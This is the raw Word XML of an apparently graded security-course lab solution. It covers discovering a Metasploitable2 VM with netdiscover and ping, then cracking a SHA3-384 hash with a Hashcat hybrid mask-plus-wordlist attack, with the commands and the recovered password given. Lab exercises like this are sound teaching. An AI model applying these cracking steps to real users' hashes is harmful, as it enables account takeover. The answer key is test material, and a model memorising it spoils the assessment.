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90C93" w14:textId="77777777" w:rsidR="002D34AF" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="80" w:line="278" w:lineRule="auto"/>
        <w:ind w:left="23" w:right="274"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Instruction:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-4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beginning,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3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sure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ping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Metasploitable2 VM (control + c to stop pinging). Create a word document with appropriate screen shots.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1174488F" w14:textId="77777777" w:rsidR="002D34AF" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="118"/>
        <w:ind w:left="23"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Command: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color w:val="C00000"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>netdiscover</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3510600E" w14:textId="77777777" w:rsidR="002D34AF" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="46"/>
        <w:ind w:left="23"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>IP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address:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-6"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="C00000"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>192.168.0.168</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5041C536" w14:textId="77777777" w:rsidR="002D34AF" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="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7840" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="762627D4" wp14:editId="30D2DA1E">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>914400</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>103916</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5720083" cy="146227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083" cy="1462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24066C2B" wp14:editId="25707B19">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>914400</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>1674398</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5731390" cy="301856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390" cy="3018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379771" w14:textId="77777777" w:rsidR="002D34AF" w:rsidRDefault="002D34AF">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="8"/>
        <w:rPr>
          <w:sz w:val="12"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1DB96FF8" w14:textId="77777777" w:rsidR="002D34AF" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="213"/>
        <w:ind w:left="23"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Command:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-3"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="C00000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>ping</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="C00000"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> 192.168.0.168</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E092D1F" w14:textId="77777777" w:rsidR="002D34AF" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="3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672F40E0" wp14:editId="1AD8C691">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>914400</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>105266</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4328168" cy="188871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8168" cy="1888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4E8A8" w14:textId="77777777" w:rsidR="002D34AF" w:rsidRDefault="002D34AF">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:sz w:val="12"/>
        </w:rPr>
        <w:sectPr w:rsidR="002D34AF">
          <w:headerReference w:type="default" r:id="rId11"/>
          <w:type w:val="continuous"/>
          <w:pgSz w:w="11910" w:h="16840"/>
          <w:pgMar w:top="1340" w:right="1133" w:bottom="280" w:left="1417" w:header="717" w:footer="0" w:gutter="0"/>
          <w:pgNumType w:start="1"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A2E7289" w14:textId="77777777" w:rsidR="002D34AF" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="306"/>
        </w:tabs>
        <w:spacing w:before="80" w:line="278" w:lineRule="auto"/>
        <w:ind w:right="337"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Visit </w:t>
      </w:r>
      <w:hyperlink r:id="rId12">
        <w:r>
          <w:rPr>
            <w:color w:val="944F71"/>
            <w:sz w:val="24"/>
            <w:u w:val="single" w:color="944F71"/>
          </w:rPr>
          <w:t>anthonyvance.com/files/YG4pZaaE.txt</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:sz w:val="24"/>
          </w:rPr>
          <w:t>.</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="C00000"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>e6f6804773a2511d3b78e3707d9af6d379440c9ecba938c07783c9759593c2d52a3cc300d2a 8dad8265f3a30ddfb193b</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72ECD532" w14:textId="77777777" w:rsidR="002D34AF" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="278" w:lineRule="auto"/>
        <w:ind w:left="306" w:right="274"/>
      </w:pPr>
      <w:r>
        <w:t>Crack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SHA3-384</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>hash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t>Hashcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>.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hybrid</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>attack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crack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hash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 following pattern:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02BBE0CB" w14:textId="77777777" w:rsidR="002D34AF" w:rsidRDefault="002D34AF">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="41"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7CAB8882" w14:textId="77777777" w:rsidR="002D34AF" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="306"/>
      </w:pPr>
      <w:r>
        <w:t>digit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>+ digit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digit +</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>digit +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dictionary_word</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5BA0EF58" w14:textId="77777777" w:rsidR="002D34AF" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="43"/>
        <w:ind w:left="306"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t>?d</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="C00000"/>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t>is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a placeholder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for any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digit (0-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="C00000"/>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t>9)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="480AE726" w14:textId="77777777" w:rsidR="002D34AF" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="48"/>
        <w:ind w:left="666"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol"/>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t></w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="C00000"/>
          <w:spacing w:val="60"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t>d</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t>d?d</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t>?d</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="C00000"/>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t>(this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is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1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="C00000"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>mask)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65527106" w14:textId="77777777" w:rsidR="002D34AF" w:rsidRDefault="002D34AF">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="83"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="26C6D351" w14:textId="77777777" w:rsidR="002D34AF" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="278" w:lineRule="auto"/>
        <w:ind w:left="306" w:right="1659"/>
      </w:pPr>
      <w:r>
        <w:t>That</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>is,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dictionary</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3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four</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>numbers</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>prepended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beginning. What is the password?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34A57FA0" w14:textId="77777777" w:rsidR="002D34AF" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1" w:line="278" w:lineRule="auto"/>
        <w:ind w:left="306" w:right="1659"/>
      </w:pPr>
      <w:r>
        <w:t>Provide</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>detailed</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>explanation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crack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password. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t>[20]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C1DF59D" w14:textId="77777777" w:rsidR="002D34AF" w:rsidRDefault="002D34AF">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="41"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="346475BB" w14:textId="77777777" w:rsidR="002D34AF" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="9079"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:spacing w:val="-2"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FDEBF3"/>
        </w:rPr>
        <w:t>Solution:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FDEBF3"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D055DC7" w14:textId="77777777" w:rsidR="002D34AF" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="164" w:line="278" w:lineRule="auto"/>
        <w:ind w:left="306" w:right="274"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Save the hash into a file: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t xml:space="preserve">echo </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="C00000"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t xml:space="preserve">"e6f6804773a2511d3b78e3707d9af6d379440c9ecba938c07783c9759593c2d52a3cc300d2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t>a8dad8265f3a30ddfb193b" &gt; hash.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21EB62C7" w14:textId="77777777" w:rsidR="002D34AF" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="3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89376" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="09465F74" wp14:editId="6BC89026">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>1094739</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>75800</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5735983" cy="30937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983" cy="309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392AB5" w14:textId="77777777" w:rsidR="002D34AF" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="163"/>
        <w:ind w:left="306"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Command:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t>hashcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="C00000"/>
          <w:spacing w:val="2"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t>-m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17500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-a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7</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="C00000"/>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t>hash.txt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?</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t>d</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t>d?d</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t>?d</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="C00000"/>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="C00000"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>rockyou.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5228475B" w14:textId="77777777" w:rsidR="002D34AF" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="2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888" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="084EE5B0" wp14:editId="55CE495C">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>1094739</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>104167</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5708308" cy="3155823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308" cy="3155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465395" w14:textId="77777777" w:rsidR="002D34AF" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="186"/>
        <w:ind w:left="306"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Password:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-3"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="C00000"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>8205lobster</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B01800E" w14:textId="77777777" w:rsidR="002D34AF" w:rsidRDefault="002D34AF">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:sectPr w:rsidR="002D34AF">
          <w:pgSz w:w="11910" w:h="16840"/>
          <w:pgMar w:top="1340" w:right="1133" w:bottom="280" w:left="1417" w:header="717" w:footer="0" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="239A558E" w14:textId="77777777" w:rsidR="002D34AF" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="9079"/>
        </w:tabs>
        <w:spacing w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:spacing w:val="-2"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FDEBF3"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Explanation:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FDEBF3"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="72D0F276" w14:textId="77777777" w:rsidR="002D34AF" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="163"/>
        <w:ind w:left="306"/>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Identify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hash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4"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>type</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54F29CD1" w14:textId="77777777" w:rsidR="002D34AF" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="43"/>
        <w:ind w:left="306"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Command: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color w:val="C00000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>hashcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="C00000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> --help</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="C00000"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="C00000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>|</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="C00000"/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="C00000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>grep</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="C00000"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="C00000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>SHA3-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="C00000"/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>384</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A76D2D1" w14:textId="77777777" w:rsidR="002D34AF" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="4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400" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="65E11FA4" wp14:editId="0887D2E3">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>1094739</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>105865</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5362900" cy="52749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900" cy="527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829469" w14:textId="77777777" w:rsidR="002D34AF" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="52"/>
        <w:ind w:left="306"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Hashcat’s</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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mode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SHA3-384:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="C00000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>-m</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="C00000"/>
          <w:spacing w:val="-3"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="C00000"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>17500</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B845CFC" w14:textId="77777777" w:rsidR="002D34AF" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="163"/>
        <w:ind w:left="306"/>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Determine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attack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pacing w:val="-4"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>mode</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FEFE50C" w14:textId="77777777" w:rsidR="002D34AF" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="43"/>
        <w:ind w:left="306"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Command: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color w:val="C00000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>hashcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="C00000"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="C00000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>--</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="C00000"/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>help</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7132CB5B" w14:textId="77777777" w:rsidR="002D34AF" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="3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912" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="5DB20F0D" wp14:editId="12F85598">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>1094739</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>104895</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1892794" cy="132759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2794" cy="1327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B065A2" w14:textId="77777777" w:rsidR="002D34AF" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="157"/>
        <w:ind w:left="306"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>-a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7: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Hybrid Mask</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>+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Wordlist</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E37D031" w14:textId="77777777" w:rsidR="002D34AF" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="43" w:line="278" w:lineRule="auto"/>
        <w:ind w:left="306" w:right="274"/>
      </w:pPr>
      <w:r>
        <w:t>This</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4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try</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>passwords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mask</w:t>
      </w:r>
      <w:r>
        <w:rPr>
